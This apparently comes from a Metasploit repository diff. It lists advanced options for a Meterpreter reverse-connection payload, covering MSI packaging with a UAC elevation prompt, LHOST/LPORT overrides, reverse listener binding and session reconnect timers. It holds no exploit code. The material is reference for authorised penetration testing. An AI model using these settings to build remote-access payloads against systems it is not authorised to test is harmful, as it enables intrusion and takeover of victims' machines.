MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module

Some files were not shown because too many files have changed in this diff Show More